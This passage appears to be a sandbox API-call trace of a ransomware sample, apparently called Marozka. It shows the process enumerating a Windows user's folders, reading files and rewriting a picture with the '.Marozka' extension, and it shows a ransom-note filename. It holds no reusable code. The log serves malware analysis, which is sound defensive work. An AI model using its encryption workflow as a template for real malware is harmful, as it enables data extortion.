[0054.331] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0054.332] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0054.332] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0054.332] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0054.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0054.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0054.332] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x37 [0054.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0054.332] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0054.332] GetFileType (hFile=0x2e0) returned 0x1 [0054.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0054.332] GetFileType (hFile=0x2e0) returned 0x1 [0054.332] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x74e6 [0054.332] ReadFile (in: hFile=0x2e0, lpBuffer=0x27f35d4, nNumberOfBytesToRead=0x74e6, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x27f35d4*, lpNumberOfBytesRead=0x5be9d4*=0x74e6, lpOverlapped=0x0) returned 1 [0054.480] CloseHandle (hObject=0x2e0) returned 1 [0054.538] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0054.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0054.538] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0054.538] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x37 [0054.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0054.538] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bd2f0) returned 1 [0054.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0054.864] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Videos", lpFilePart=0x0) returned 0x23 [0054.864] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xffffffff [0054.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab8) returned 1 [0054.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0054.866] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x27 [0054.866] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7db48 [0054.867] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.867] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.867] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0054.867] FindClose (in: hFindFile=0xa7db48 | out: hFindFile=0xa7db48) returned 1 [0054.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0054.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0054.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0054.868] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x27 [0054.868] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d748 [0054.868] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.868] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0054.868] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0054.868] FindClose (in: hFindFile=0xa7d748 | out: hFindFile=0xa7d748) returned 1 [0054.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0054.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0054.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0054.869] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Downloads", lpFilePart=0x0) returned 0x19 [0054.869] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dac8 [0054.869] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.869] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.869] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0054.870] FindClose (in: hFindFile=0xa7dac8 | out: hFindFile=0xa7dac8) returned 1 [0054.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0054.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0054.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0054.870] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Downloads", lpFilePart=0x0) returned 0x19 [0054.870] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0054.870] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.870] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.870] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0054.870] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0054.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0054.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0054.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0054.871] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0x0) returned 0x18 [0054.871] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0054.871] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.871] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.871] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.871] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.871] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.872] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.872] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.872] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.872] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.872] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.872] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.872] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.873] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.873] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.873] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.873] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.873] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.873] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.873] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.874] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.874] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.874] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.874] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.874] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.875] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.875] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.875] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.875] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.875] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.875] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.875] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.875] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.876] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.876] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.876] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.876] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.876] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.876] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.876] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.877] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.877] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.877] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.877] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0054.877] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0054.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0054.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0054.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0054.877] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0x0) returned 0x18 [0054.877] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0054.878] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.878] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.878] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.878] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.878] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.879] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.879] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.879] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.879] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.879] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.879] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.880] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.880] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.880] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.880] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.880] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.880] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.881] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.881] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.881] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.881] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.881] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.881] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.882] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.882] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.882] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.882] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.882] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.882] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.883] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.883] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.883] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.883] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.883] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.883] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.884] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.884] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.884] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.884] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.884] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.884] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.884] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0054.884] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0054.885] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0054.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0054.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0054.885] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg", lpFilePart=0x0) returned 0x2b [0054.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0054.885] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\-hqop1j b8cbng.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0054.885] GetFileType (hFile=0x2e0) returned 0x1 [0054.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0054.885] GetFileType (hFile=0x2e0) returned 0x1 [0054.885] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x17fbe [0054.885] ReadFile (in: hFile=0x2e0, lpBuffer=0x37af518, nNumberOfBytesToRead=0x17fbe, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x37af518*, lpNumberOfBytesRead=0x5beabc*=0x17fbe, lpOverlapped=0x0) returned 1 [0054.885] CloseHandle (hObject=0x2e0) returned 1 [0054.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0054.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0054.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0054.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg", lpFilePart=0x0) returned 0x2b [0054.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0054.953] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\-hqop1j b8cbng.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0054.954] GetFileType (hFile=0x2e0) returned 0x1 [0054.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0054.954] GetFileType (hFile=0x2e0) returned 0x1 [0054.954] WriteFile (in: hFile=0x2e0, lpBuffer=0x3827418*, nNumberOfBytesToWrite=0x17fc0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x3827418*, lpNumberOfBytesWritten=0x5beab0*=0x17fc0, lpOverlapped=0x0) returned 1 [0054.957] CloseHandle (hObject=0x2e0) returned 1 [0054.959] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg", lpFilePart=0x0) returned 0x2b [0054.959] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg.Marozka", lpFilePart=0x0) returned 0x33 [0054.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0054.959] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\-hqop1j b8cbng.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68543a0, ftCreationTime.dwHighDateTime=0x1d4d063, ftLastAccessTime.dwLowDateTime=0x92aed6a0, ftLastAccessTime.dwHighDateTime=0x1d4d0a5, ftLastWriteTime.dwLowDateTime=0xe37d2871, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x17fc0)) returned 1 [0054.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0054.959] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\-hqop1j b8cbng.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\-HQOP1J B8cBNG.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\-hqop1j b8cbng.jpg.marozka")) returned 1 [0054.960] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp", lpFilePart=0x0) returned 0x2e [0054.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0054.960] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\-lLUKbCU3kHxBQxId.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\-llukbcu3khxbqxid.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 